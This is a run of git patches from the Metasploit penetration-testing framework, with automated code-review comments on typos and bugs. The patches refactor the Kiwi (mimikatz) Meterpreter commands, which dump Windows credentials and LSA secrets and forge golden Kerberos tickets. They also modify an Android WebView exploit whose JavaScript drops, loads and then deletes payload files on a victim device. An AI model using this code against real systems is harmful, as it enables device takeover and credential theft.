[Array[Byte]] - Array of bytes to convert. + # + # Returns [String]. + # def to_hex_dump(bytes) return nil unless bytes @@ -235,11 +341,26 @@ protected }.join(' ') end + # + # Convert an array of bytes to a hex string without spaces + # AABBCCDDEEFF + # + # +bytes+ [Array[Byte]] - Array of bytes to convert. + # + # Returns [String]. + # def to_hex_string(bytes) return nil unless bytes bytes.unpack('H*')[0] end + # + # Convert an array of bytes to a GUID string + # + # +bytes+ Array of bytes to convert. + # + # Returns [String]. + # def to_guid(bytes) return nil unless bytes s = bytes.unpack('H*')[0] 
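Review bot: The comments added for `to_hex_string` and `to_guid` describe `+bytes+` as an array of bytes, but both bodies call `bytes.unpack('H*')`, which is a String method, so the argument has to be a binary String. Suggest `# +bytes+ [String] - Binary string to convert.` for both. The same wording on `to_hex_dump` in the previous hunk probably needs the same change, though its body is not visible here, and the `to_guid` body continues past the end of this hunk.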
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 8972d0aeb2..5fe2ac9de0 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -14,6 +14,7 @@ module Ui # http://blog.gentilkiwi.com/mimikatz # # extension converted by OJ Reeves (TheColonial) +# ### class Console::CommandDispatcher::Kiwi @@ -22,7 +23,16 @@ class Console::CommandDispatcher::Kiwi include Console::CommandDispatcher # - # Initializes an instance of the priv command interaction. + # Name for this dispatcher + # + def name + "Kiwi" + end + + # + # Initializes an instance of the priv command interaction. This function + # also outputs a banner which gives proper acknowledgement to the original + # author of the Mimikatz 2.0 software. # def initialize(shell) super @@ -63,36 +73,9 @@ class Console::CommandDispatcher::Kiwi } end - def scrape_passwords(provider, method) - get_privs - print_status("Retrieving #{provider} credentials") - accounts = method.call - - table = Rex::Ui::Text::Table.new( - 'Header' => "#{provider} credentials", - 'Indent' => 0, - 'SortIndex' => 4, - 'Columns' => - [ - 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' - ] - ) - - accounts.each do |acc| - table << [ - acc[:domain], - acc[:username], - acc[:password], - "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm], - acc[:ntlm] - ] - end - - print_line table.to_s - return true - end - + # + # Invoke the LSA secret dump on thet target. + # def cmd_lsa_dump(*args) get_privs @@ -148,6 +131,9 @@ class Console::CommandDispatcher::Kiwi print_line end + # + # Invoke the golden kerberos ticket creation functionality on the target. + # def cmd_golden_ticket_create(*args) if args.length != 5 print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") 
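Review bot: The comment added above `cmd_lsa_dump` reads `# Invoke the LSA secret dump on thet target.`; it should be `# Invoke the LSA secret dump on the target.`. In the same file section, the rewritten comment on `initialize` still says it initializes "the priv command interaction", which looks carried over from another dispatcher and would read better naming the kiwi dispatcher.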
@@ -166,12 +152,18 @@ class Console::CommandDispatcher::Kiwi print_good("Golden Kerberos ticket written to #{target}") end + # + # Valid options for the ticket listing functionality. + # @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ], "-e" => [ false, "Export Kerberos tickets to disk" ], "-p" => [ true, "Path to export Kerberos tickets to" ] ) + # + # Output the usage for the ticket listing functionality. + # def kerberos_ticket_list_usage print( "\nUsage: kerberos_ticket_list [-h] [-e ] [-p ]\n\n" + @@ -179,6 +171,9 @@ class Console::CommandDispatcher::Kiwi @@kerberos_ticket_list_opts.usage) end + # + # Invoke the kerberos ticket listing functionality on the target machine. + # def cmd_kerberos_ticket_list(*args) if args.include?("-h") kerberos_ticket_list_usage @@ -243,11 +238,17 @@ class Console::CommandDispatcher::Kiwi return true end + # + # Invoke the kerberos ticket purging functionality on the target machine. + # def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") end + # + # Use a locally stored Kerberos ticket in the current session. + # def cmd_kerberos_ticket_use(*args) if args.length != 1 print_line("Usage: kerberos_ticket_use ticketpath") 
@@ -264,41 +265,64 @@ class Console::CommandDispatcher::Kiwi print_good("Kerberos ticket applied successfully") end + # + # Dump all the possible credentials to screen. + # def cmd_creds_all(*args) method = Proc.new { client.kiwi.all_pass } scrape_passwords("all", method) end + # + # Dump all wdigest credentials to screen. + # def cmd_creds_wdigest(*args) method = Proc.new { client.kiwi.wdigest } scrape_passwords("wdigest", method) end + # + # Dump all msv credentials to screen. + # def cmd_creds_msv(*args) method = Proc.new { client.kiwi.msv } scrape_passwords("msv", method) end + # + # Dump all LiveSSP credentials to screen. + # def cmd_creds_livessp(*args) method = Proc.new { client.kiwi.livessp } scrape_passwords("livessp", method) end + # + # Dump all SSP credentials to screen. + # def cmd_creds_ssp(*args) method = Proc.new { client.kiwi.ssp } scrape_passwords("ssp", method) end + # + # Dump all TSPKG credentials to screen. + # def cmd_creds_tspkg(*args) method = Proc.new { client.kiwi.tspkg } scrape_passwords("tspkg", method) end + # + # Dump all Kerberos credentials to screen. + # def cmd_creds_kerberos(*args) method = Proc.new { client.kiwi.kerberos } scrape_passwords("kerberos", method) end +protected + def get_privs unless system_check print_status("Attempting to getprivs") 
@@ -323,11 +347,43 @@ class Console::CommandDispatcher::Kiwi end # - # Name for this dispatcher + # Infoke the password scraping routine on the target. # - def name - "Kiwi" + # +provider+ [String] - The name of the type of credentials to dump (used for + # display purposes only). + # +method+ [Block] - Block that contains a call to the method that invokes the + # appropriate function on the client that returns the results from Meterpreter. + # + def scrape_passwords(provider, method) + get_privs + print_status("Retrieving #{provider} credentials") + accounts = method.call + + table = Rex::Ui::Text::Table.new( + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 4, + 'Columns' => + [ + 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' + ] + ) + + accounts.each do |acc| + table << [ + acc[:domain], + acc[:username], + acc[:password], + "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", + acc[:lm], + acc[:ntlm] + ] + end + + print_line table.to_s + return true end + end end From f80c7b7b5162bf646f158744a87773ee28da1bdd Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 15:55:12 +1000 Subject: [PATCH 070/853] Fix silly typo --- lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 5fe2ac9de0..488c54809a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -347,7 +347,7 @@ protected end # - # Infoke the password scraping routine on the target. + # Invoke the password scraping routine on the target. # # +provider+ [String] - The name of the type of credentials to dump (used for # display purposes only). From 959cedb9b16a18d9525b9c28c64445393f12d1ba Mon Sep 17 00:00:00 2001 
From: OJ Date: Wed, 19 Mar 2014 16:19:05 +1000 Subject: [PATCH 071/853] Bit more code tidying --- lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 20cf637984..e780c98122 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -89,10 +89,10 @@ class Kiwi < Extension :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), - :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), :nt6keys => [], - :secrets => [], - :samkeys => [] + :secrets => [], + :samkeys => [] } response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| @@ -112,7 +112,7 @@ class Kiwi < Extension } r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) - r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) + r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) result[:secrets] << r end @@ -365,8 +365,8 @@ protected return nil unless bytes s = bytes.unpack('H*')[0] parts = [ - s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], - s[10, 2] + s[8, 2], + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], s[14, 2] + s[12, 2], s[16, 4], s[20, 12] From 84728c9fc98e17d3148a5829a19b07e53ed54198 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 16:19:23 +1000 Subject: [PATCH 072/853] Code tidying and defaulting to empty strings for table format --- .../ui/console/command_dispatcher/kiwi.rb | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 488c54809a..6d1f74ecec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -180,7 +180,9 @@ class Console::CommandDispatcher::Kiwi return true end + # default to not exporting export = false + # default to the current folder for dumping tickets export_path = "." @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val| @@ -198,10 +200,10 @@ class Console::CommandDispatcher::Kiwi fields << 'Export Path' if export table = Rex::Ui::Text::Table.new( - 'Header' => "Kerberos Tickets", - 'Indent' => 0, + 'Header' => "Kerberos Tickets", + 'Indent' => 0, 'SortIndex' => 0, - 'Columns' => fields + 'Columns' => fields ) tickets.each do |t| @@ -215,6 +217,7 @@ class Console::CommandDispatcher::Kiwi "#{t[:flags].to_s(16).rjust(8, '0')} (#{flag_list})" ] + # write out each ticket to disk if export is enabled. if export path = "" if t[:raw] @@ -244,6 +247,8 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") + + return true end # @@ -260,9 +265,12 @@ class Console::CommandDispatcher::Kiwi ::File.open(target, 'rb') do |f| ticket += f.read(f.stat.size) end + print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") client.kiwi.kerberos_ticket_use(ticket) print_good("Kerberos ticket applied successfully") + + return true end # @@ -360,10 +368,10 @@ protected accounts = method.call table = Rex::Ui::Text::Table.new( - 'Header' => "#{provider} credentials", - 'Indent' => 0, - 'SortIndex' => 4, - 'Columns' => + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => [ 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' ] 
@@ -371,12 +379,12 @@ protected accounts.each do |acc| table << [ - acc[:domain], - acc[:username], - acc[:password], + acc[:domain] || "", + acc[:username] || "", + acc[:password] || "", "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm], - acc[:ntlm] + acc[:lm] || "", + acc[:ntlm] || "" ] end From 11f9bfadb1ca76b7fe031c21fd4a137f8c0a1d38 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 18:40:53 +1000 Subject: [PATCH 073/853] Final bits of documentation and code tweaking --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 25 +++--- .../ui/console/command_dispatcher/kiwi.rb | 80 ++++++++++++++----- 2 files changed, 72 insertions(+), 33 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index e780c98122..8851551ad9 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -32,8 +32,7 @@ class Kiwi < Extension PWD_ID_SEK_TSPKG = 4 PWD_ID_SEK_LIVESSP = 5 PWD_ID_SEK_SSP = 6 - PWD_ID_SEK_TICKETS = 7 - PWD_ID_SEK_DPAPI = 8 + PWD_ID_SEK_DPAPI = 7 # # List of names which represent the flags that are part of the @@ -77,7 +76,7 @@ class Kiwi < Extension # # Dump the LSA secrets from the target machine. # - # Returns [Array[Hash]] + # Returns [Hash] # def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -126,7 +125,7 @@ class Kiwi < Extension } end - return result + result end # @@ -149,7 +148,7 @@ class Kiwi < Extension end end - return results + results end # @@ -182,7 +181,7 @@ class Kiwi < Extension } end - return results + results end # @@ -266,7 +265,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def all_pass - return scrape_passwords(PWD_ID_SEK_ALLPASS) + scrape_passwords(PWD_ID_SEK_ALLPASS) end # @@ -275,7 +274,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def wdigest - return scrape_passwords(PWD_ID_SEK_WDIGEST) + scrape_passwords(PWD_ID_SEK_WDIGEST) end # 
@@ -284,7 +283,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def msv - return scrape_passwords(PWD_ID_SEK_MSV) + scrape_passwords(PWD_ID_SEK_MSV) end # @@ -293,7 +292,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def livessp - return scrape_passwords(PWD_ID_SEK_LIVESSP) + scrape_passwords(PWD_ID_SEK_LIVESSP) end # @@ -302,7 +301,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def ssp - return scrape_passwords(PWD_ID_SEK_SSP) + scrape_passwords(PWD_ID_SEK_SSP) end # @@ -311,7 +310,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def tspkg - return scrape_passwords(PWD_ID_SEK_TSPKG) + scrape_passwords(PWD_ID_SEK_TSPKG) end # @@ -320,7 +319,7 @@ class Kiwi < Extension # Returns [Array[Hash]] # def kerberos - return scrape_passwords(PWD_ID_SEK_KERBEROS) + scrape_passwords(PWD_ID_SEK_KERBEROS) end protected diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 6d1f74ecec..8db656180c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -86,9 +86,9 @@ class Console::CommandDispatcher::Kiwi # use within a table so instead we'll dump in a linear fashion print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major] - print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] - print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] - print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] + print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] + print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] + print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] print_line print_line("NT6 Key Count : #{lsa[:nt6keys].length}") 
@@ -109,9 +109,9 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. Name : #{s[:name]}") print_line("#{index}. Service : #{s[:service]}") if s[:service] - print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] + print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] print_line("#{index}. Current : #{s[:current]}") if s[:current] - print_line("#{index}. Old : #{s[:old]}") if s[:old] + print_line("#{index}. Old : #{s[:old]}") if s[:old] end end @@ -123,7 +123,7 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. RID : #{s[:rid]}") print_line("#{index}. User : #{s[:user]}") - print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] + print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] end end 
@@ -131,24 +131,70 @@ class Console::CommandDispatcher::Kiwi print_line end + # + # Valid options for the golden ticket creation functionality. + # + @@golden_ticket_create_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-u" => [ true, "Name of the user to create the ticket for" ], + "-d" => [ true, "Name of the target domain" ], + "-k" => [ true, "Kerberos ticket granting token" ], + "-t" => [ true, "Path of the file to store the ticket in" ], + "-s" => [ true, "SID of the domain" ] + ) + + # + # Output the usage for the ticket listing functionality. + # + def golden_ticket_create_usage + print( + "\nUsage: kerberos_ticket_list [-h] -u -d -k -s -t \n\n" + + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + + @@golden_ticket_create_opts.usage) + end + # # Invoke the golden kerberos ticket creation functionality on the target. # def cmd_golden_ticket_create(*args) - if args.length != 5 - print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") + if args.include?("-h") + golden_ticket_create_usage + return + end + + user = nil + domain = nil + sid = nil + tgt = nil + target = nil + + @@golden_ticket_create_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + user = val + when "-d" + domain = val + when "-k" + tgt = val + when "-t" + target = val + when "-s" + sid = val + end + } + + # all parameters are required + unless user && domain && sid && tgt && target + golden_ticket_create_usage return end - user = args[0] - domain = args[1] - sid = args[2] - tgt = args[3] - target = args[4] ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ::File.open( target, 'wb' ) do |f| f.write ticket end + print_good("Golden Kerberos ticket written to #{target}") end @@ -177,7 +223,7 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_list(*args) if args.include?("-h") kerberos_ticket_list_usage - return true + return end # default to not exporting 
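Review bot: `golden_ticket_create_usage` prints `Usage: kerberos_ticket_list ...` and its header comment says it outputs the usage "for the ticket listing functionality"; both appear copied from `kerberos_ticket_list_usage`. The string should begin `"\nUsage: golden_ticket_create [-h] ..."` and the comment should name the golden ticket creation command. The argument placeholders after each flag also appear to be missing from the usage line as shown, though that may be an artifact of how this page was rendered.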
@@ -237,8 +283,6 @@ class Console::CommandDispatcher::Kiwi print_line print_line(table.to_s) print_line("Total Tickets : #{tickets.length}") - - return true end # @@ -247,8 +291,6 @@ class Console::CommandDispatcher::Kiwi def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") - - return true end # @@ -269,8 +311,6 @@ class Console::CommandDispatcher::Kiwi print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") client.kiwi.kerberos_ticket_use(ticket) print_good("Kerberos ticket applied successfully") - - return true end # From f9972239cfb76be42304598b12c08f637fd7c27e Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 23 Mar 2014 16:36:26 +0000 Subject: [PATCH 074/853] randomize payload filename --- .../browser/webview_addjavascriptinterface.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 9024a454c8..f2e9cfaaaa 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -86,12 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end - def dalvikstager - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so') - File.read(localfile, :mode => 'rb') + def ndkstager(stagename) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so') + data = File.read(localfile, :mode => 'rb') + data.gsub!('PLOAD', stagename) end def js + stagename = Rex::Text.rand_text_alpha(5) %Q| function exec(obj) { // ensure that the object contains a native interface 
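Review bot: `ndkstager` ends with `data.gsub!('PLOAD', stagename)`, and `gsub!` returns nil when nothing was replaced, so the method returns nil rather than the file contents whenever the placeholder is absent from the library file. The non-mutating form, `data.gsub('PLOAD', stagename)`, always returns a String. The `js` method that calls it continues outside this hunk.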
@@ -101,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var runtime = m.invoke(null, null); var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; - var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; - var stagePath = path + '/stage.apk'; + var stagePath = path + '/#{stagename}.apk'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); @@ -119,6 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote runtime.exec(['chmod', '700', stagePath]).waitFor(); runtime.load(libraryPath); + runtime.exec(['rm', stagePath]).waitFor(); return true; } From 25ca0552e0f5114b6f7fdb685f0934217f9543d6 Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 23 Mar 2014 17:00:29 +0000 Subject: [PATCH 075/853] cleanup files after exploit --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index f2e9cfaaaa..cab66ca0f4 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; + var dexPath = path + '/#{stagename}.dex'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); @@ -122,6 +123,8 @@ class Metasploit3 < Msf::Exploit::Remote runtime.load(libraryPath); runtime.exec(['rm', stagePath]).waitFor(); + runtime.exec(['rm', libraryPath]).waitFor(); + runtime.exec(['rm', dexPath]).waitFor(); return true; } From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 078/853] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking 
@@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: 
#{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From 46f7e6060fd651abb2a99ac4d314bad6d986f5de Mon Sep 17 00:00:00 2001 From: joe Date: Tue, 25 Mar 2014 09:39:53 -0700 Subject: [PATCH 079/853] Add the updated bins from timwr. --- .../libs/armeabi-v7a/libdalvikstager.so | Bin 13436 -> 0 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 13432 -> 13432 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 5328 -> 5328 bytes .../{libdalvikstager.so => libndkstager.so} | Bin 5220 -> 5220 bytes data/android/meterpreter.jar | Bin 38353 -> 38353 bytes data/android/metstage.jar | Bin 1851 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 7 files changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so rename data/android/libs/armeabi/{libdalvikstager.so => libndkstager.so} (81%) rename data/android/libs/mips/{libdalvikstager.so => libndkstager.so} (92%) rename data/android/libs/x86/{libdalvikstager.so => libndkstager.so} (59%) 
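Review bot: In the rewritten `check`, the result of `res = nclient.send_recv(req, 1024)` is dereferenced by `res.code != 200` without a nil test, so a host that sends no response would raise NoMethodError, which the trailing `rescue RuntimeError` does not catch. Guarding with `if res.nil? || res.code != 200` keeps the method on its `Exploit::CheckCode::Unknown` path. The `if (req)` test appears to check the request object rather than the response, so its `did not respond` branch is probably unreachable. The second argument to `send_recv` is presumably a timeout in seconds, which makes 1024 worth confirming.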
diff --git a/data/android/libs/armeabi-v7a/libdalvikstager.so b/data/android/libs/armeabi-v7a/libdalvikstager.so deleted file mode 100644 index 01f47d9a3704183e404d3e7b9ee7f8ca0276b9fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 13436 zcmeHOe|%I|mA`N14H<^ey!^n@wAvSb)X+jQ0j#l2+W}$-Y> zHFT{^eo!zrOZcU<7I}5~C|J~hy4!V2jdr(Pt^IuHwtiZb)tUErHch*dTGpacXTRS! z?+ud_wC>;B4=3lId(S=R+;h)8_r5oe?H{kJkt9ht#VtyOLoGz(!V0U$vrwoa2Yu5- zk(k8xEJ&bEkZo|rgS5)F*+LLJq!eMvf2>T1$L>r+69y0{m;ElFqv$`1e!>ON1ol(M zDl^sy^qyjkM=L}{8)pjPz^iB@IQFf^_-y@+7(j63PZW%D{26G6R*b z1L|!48R&l+bafW}Gte?8g~IV;z~^tUNQ<5fhZJS?&jURxi>?KIJd19~av=TjY0wGC zE3)N(c0zv-=vTp5ZTIg5U0ryI{%RJ#3Z8$SKtBgM@gX7hyVLfcnb7|`(4WG5>+F6P z)-5;7-eS-fv*zmueM46ND$q??bTjDTEV>)?(c(+%F$j7H^bvbL$3fqHJ!IPSv!J7( zTWtClpwEC-ZTb(OFM?+Lay@*on}ePH8K70r!*>72Kxg}R1?ZPy-z>X-(**iK&=<1$ z|8W9+2=oo`r!)RvC(ti}4rKL@PM}ku8?*WgF_CO~Ht5(4$gu6J1pQsmb8UJh=mco) z8_vHS^z@mR{QD4SHH$t3TBa}*MZA?dGJzhNK#NeQp(`BP)Z7+sX?`GLli^sTt2ri? ze_~l^Wm{c)xKV75#G=iOqO&d9(cBi>B-*2qHqjA5PeV(4C&zWh!VUL@8k+74Z3;KH zjBD7uHQdpNmT)Azu{pH0?K917jiH8UG!*Ud+e+57wNOncw7G3-Xib`ysGX}=Qp 